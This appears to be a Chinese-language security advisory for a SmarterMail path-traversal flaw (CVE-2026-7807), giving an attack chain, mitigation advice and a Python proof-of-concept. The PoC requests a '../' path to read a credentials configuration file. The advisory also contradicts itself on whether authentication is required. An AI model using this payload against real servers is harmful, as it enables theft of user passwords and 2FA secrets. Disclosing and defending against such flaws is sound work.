CVE-2026-7807 SmarterMail本地文件包含漏洞

漏洞信息

漏洞编号

CVE-2026-7807

漏洞类型

本地文件包含

CVSS评分

8.1 高危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

SmarterTools SmarterMail

漏洞概述

SmarterTools SmarterMail 9560之前的构建版本中存在本地文件包含漏洞。由于/api/v1/report/summary/{type}接口存在缺陷，经过认证的攻击者可读取系统上任意.json文件。结合系统弱加密算法和硬编码密钥，攻击者能解密并获取所有用户的存储密码及2FA密钥，造成严重信息泄露。

技术细节

该漏洞位于SmarterMail的`/api/v1/report/summary/{type}` API端点。由于系统未对`{type}`参数进行严格的路径合法性校验，允许攻击者利用目录遍历技术（如`../`）读取服务器上的任意.json文件。更为关键的是，SmarterMail在存储用户密码和双因素认证（2FA）密钥时，采用了较弱的加密算法，并且解密密钥被硬编码在程序代码中。攻击者首先通过LFI漏洞读取包含加密凭证的配置文件，随后利用硬编码密钥和已知的弱加密算法在本地解密数据，从而获取所有用户的明文密码和2FA秘钥，实现对系统的全面控制。

攻击链分析

STEP 1

1. 侦察

攻击者识别目标运行的是SmarterMail且版本低于9560。

STEP 2

2. 利用漏洞

攻击者向`/api/v1/report/summary/{type}`发送恶意请求，利用路径遍历读取包含加密凭证的.json配置文件。

STEP 3

3. 解密数据

利用已知的硬编码密钥和弱加密算法，对下载的.json文件进行离线解密。

STEP 4

4. 获取访问权限

提取解密后的用户密码和2FA密钥，用于登录用户账户或接管管理员权限。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests

# Target configuration
target_host = "http://target-smartermail-server.com"
vulnerable_endpoint = "/api/v1/report/summary/"

# Path traversal payload to read a sensitive configuration file
# Attackers may target specific JSON files containing encrypted credentials
payload = "../../Program Files/SmarterTools/SmarterMail/MailConfig/settings.json"

url = f"{target_host}{vulnerable_endpoint}{payload}"

headers = {
    "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36",
    "Accept": "application/json"
}

try:
    response = requests.get(url, headers=headers, timeout=10)
    
    if response.status_code == 200:
        print("[+] Vulnerability Exploited Successfully!")
        print("[+] Response Content:")
        print(response.text)
        
        # Logic to decrypt the captured data would follow here
        # using the known hardcoded key and weak algorithm.
    else:
        print(f"[-] Exploit failed. Status Code: {response.status_code}")
        print("[-] Response:")
        print(response.text)

except Exception as e:
    print(f"[!] Error occurred: {e}")

影响范围

SmarterTools SmarterMail < build 9560

防御指南

临时缓解措施

建议立即升级至SmarterMail build 9560或更高版本以修补此漏洞。如果无法立即升级，应在WAF或反向代理层配置规则，阻断对`/api/v1/report/summary/`路径的非常规请求，或仅允许受信任的内网IP访问该API。鉴于漏洞可能导致凭证泄露，管理员应视为系统已遭入侵，全面排查日志，并强制所有用户更改密码及双因素认证凭据。